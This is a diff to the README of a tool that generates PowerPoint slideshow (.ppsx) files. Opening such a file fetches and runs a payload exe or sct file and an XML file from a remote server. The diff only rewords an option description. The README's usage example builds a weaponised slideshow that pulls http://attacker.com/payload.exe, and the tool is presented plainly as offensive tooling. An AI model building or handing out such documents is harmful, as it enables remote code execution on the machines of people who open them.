temesgeny/ppsx-file-generator/README.md

         input_filename          The input ppsx file name.

         -o              Output .ppsx file name, (inlcude the .ppsx).
         -p              The payload exe or sct file url.
                         It must be in an accessible web server.
-(Optional) -x              The full xml uri to be called by the ppsx file.
+(Optional for xml file) -x              The full xml uri to be called by the ppsx file.
                         It must be in an accessible web server.(Required)

 ```
 python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx